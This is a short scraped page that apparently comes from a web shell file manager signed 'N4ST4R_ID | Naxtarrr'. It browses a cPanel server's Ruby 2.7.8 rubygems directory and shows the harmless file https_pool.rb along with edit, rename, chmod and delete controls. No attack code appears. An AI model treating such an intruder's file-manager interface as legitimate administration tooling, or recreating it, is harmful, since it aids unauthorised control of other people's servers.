Submit
Path:
~
/
/
opt
/
cpanel
/
ea-ruby27
/
root
/
usr
/
share
/
ruby
/
ruby-2.7.8
/
rubygems
/
request
/
File Content:
https_pool.rb
# frozen_string_literal: true class Gem::Request::HTTPSPool < Gem::Request::HTTPPool # :nodoc: private def setup_connection(connection) Gem::Request.configure_connection_for_https(connection, @cert_files) super end end
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
connection_pools.rb
2440 bytes
0644
http_pool.rb
1032 bytes
0644
https_pool.rb
236 bytes
0644
N4ST4R_ID | Naxtarrr